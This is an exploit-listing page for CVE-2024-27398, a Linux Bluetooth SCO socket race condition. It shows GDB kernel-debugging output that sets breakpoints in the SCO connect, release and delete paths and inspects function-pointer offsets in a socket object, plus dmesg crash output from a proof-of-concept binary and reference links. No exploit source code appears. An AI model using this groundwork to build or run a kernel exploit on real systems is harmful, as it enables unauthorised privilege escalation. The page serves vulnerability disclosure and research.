Exploit for CVE-2024-27398

Name: Exploit for CVE-2024-27398
Rating: 5 (823 reviews)
2025-03-08 | CVSS 9.1
## https://sploitus.com/exploit?id=6C9F9253-B608-5184-B571-C8754462C82C
# CVE-2024-27398
CVE-2024-27398 POC

# Dmesg Output
![PoC Screenshot](ss1_poc.png)

## 📍 GDB Breakpoints
```gdb
GNU gdb (Ubuntu 12.1-0ubuntu1~22.04.2) 12.1
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word".
(gdb) file vmlinxsef680 
Reading symbols from vmlinxsef680...
(gdb) target remote :1234
Remote debugging using :1234

(gdb) i b
Num     Type           Disp Enb Address            What
50      breakpoint     keep y   0xffffffff81e22640 in sco_sock_connect at net/bluetooth/sco.c:569
	breakpoint already hit 2 times
51      breakpoint     keep y   0xffffffff81e236e0 in sco_sock_release at net/bluetooth/sco.c:1237
	breakpoint already hit 2 times
52      breakpoint     keep y   0xffffffff81e22ef0 in sco_conn_del at net/bluetooth/sco.c:182

(gdb) p sock->sk
$224 = (struct sock *) 0xffff88810a2ee400
(gdb) x/gx 0xffff88810a2ee400 + 0x2a8
0xffff88810a2ee6a8:	0xffffffff81bd3390
(gdb) c
Continuing.

Thread 1 hit Breakpoint 38, sco_sock_connect (sock=0xffff88810d28d040, addr=0xffffc9000062fe80, alen=8, flags=2050) at net/bluetooth/sco.c:569
569		release_sock(sk);
(gdb) x/gx 0xffff88810a2ee400 + 0x2a8 // obj 1 offset
0xffff88810a2ee6a8:	0xffffffff81bd3390
(gdb) x/gx 0xffff88810a2ee400 + 0x2a8 // 
0xffff88810a2ee6a8:	0xffffffff81bd3390
(gdb) x/gx 0xffff88810a2ee400 + 0x2b0 // obj 2 offset
0xffff88810a2ee6b0:	0xffffffff81bd34b0
(gdb) x/gx 0xffff88810a2ee400 + 0x2a0 //obj 3 offset
0xffff88810a2ee6a0:	0xffffffff81bd17b0


//////////////////////// v2
[362952.908697] poc9[893251]: segfault at ffffffff832df600 ip 000055a3bc3cf64d sp 00007fffdaa09ea0 error 5 in poc9[55a3bc3cf000+1000] likely on CPU 1 (core 1, socket 0)


[362952.909557] Code: 8b 45 f0 b9 ef be ad de 48 c7 c2 00 f6 2d 83 48 8d 35 2f 0a 00 00 48 89 c7 b8 00 00 00 00 e8 9a fb ff ff 48 c7 c0 00 f6 2d 83 <48> 8b 10 48 8b 45 f0 48 8d 0d 35 0a 00 00 48 89 ce 48 89 c7 b8 00

(gdb) p sock->sk->sk_error_report
$71 = (void (*)(struct sock *)) 0xffffffff832df600 <sock_def_error_report>

References
https://github.com/qiutianshu/sco-race-condition
https://www.openwall.com/lists/oss-security/2024/11/29/1